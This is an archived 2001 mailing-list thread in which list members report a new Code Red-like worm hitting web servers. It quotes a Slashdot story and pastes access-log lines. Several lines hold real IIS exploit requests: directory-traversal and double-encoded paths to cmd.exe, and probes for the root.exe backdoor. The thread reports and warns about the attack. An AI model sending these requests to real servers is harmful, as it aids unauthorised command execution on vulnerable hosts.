Worm/Virus alert

From: Sipke de Wal <sipke_at_wxs.nl>
Date: Tue Sep 18 16:05:12 2001

It started coming in at my linux webserver at 15:55 local time
(the Netherlands) that is 14:55 UTC

Fortunately it doesn't do anything usefull exept that it cloggs up
my access_log

If this is the way of the future... MS*cks driven webservers are doomed!

Besides this newbie I had about 1500 Code Red tries in August, and
about 800+ uptil now in September. Code-Red was just leveling off
a bit.

below a snip from my access_log:
(sorry for the wrapping) - - [18/Sep/2001:19:24:50 +0200] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 280 - - [18/Sep/2001:19:24:51 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0"
404 278 - - [18/Sep/2001:19:24:52 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 288 - - [18/Sep/2001:19:24:52 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 288 - - [18/Sep/2001:19:24:53 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 - - [18/Sep/2001:19:24:57 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 319 - - [18/Sep/2001:19:25:01 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 319 - - [18/Sep/2001:19:25:05 +0200] "GET
32/cmd.exe?/c+dir HTTP/1.0" 404 335


Sipke de Wal
----- Original Message -----
From: Marion Bates <Marion.Bates_at_dartmouth.edu>
To: <classiccmp_at_classiccmp.org>
Sent: Tuesday, September 18, 2001 7:11 PM
Subject: Worm/Virus alert

> Hey all,
> Sorry bout the spam (and sorry if you already know about this) but I figured
you folks might want to know to watch out for a new Code Red-esque worm that's
running rampant...below is from SlashDot.
> -- MB
> **************
> New (More) Annoying Microsoft Worm Hits Net
> Posted by CmdrTaco on Tuesday September 18, _at_10:10AM
> from the what-a-pain-in-the-arse dept.
> A new worm seems to be running rampant Unlike Code Red, it attempts to hit
boxes with many different exploits (including what looks like an attempt to
exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts
on its neighbors. There is also a new mail worm mailing WAV files or something
with bits of what appears to be the registry... it may or may not be related.
Got any words on this? Shut down those windows boxes and stop opening
attachments. And make that 21. Got another one while writing this story. All my
hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby
> Here are examples of the requests it's sending:
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> While writing this story I was hit a total of 4 times, 16 GET attempts per
attack. In only 4 minutes. Also of interest, My desktop has now been hit about
500 times today, all from 208.x.x.x IPs. This might be really bad. I still
haven't read anything about this anywhere else, so you heard it here first ;)
> Update: Web servers compromised by this worm apparently attach a "readme.eml"
to all web pages served... and due to a bug in IE5, it will automatically
execute the file! Yay Internet Explorer!
Received on Tue Sep 18 2001 - 16:05:12 BST

This archive was generated by hypermail 2.3.0 : Fri Oct 10 2014 - 23:34:25 BST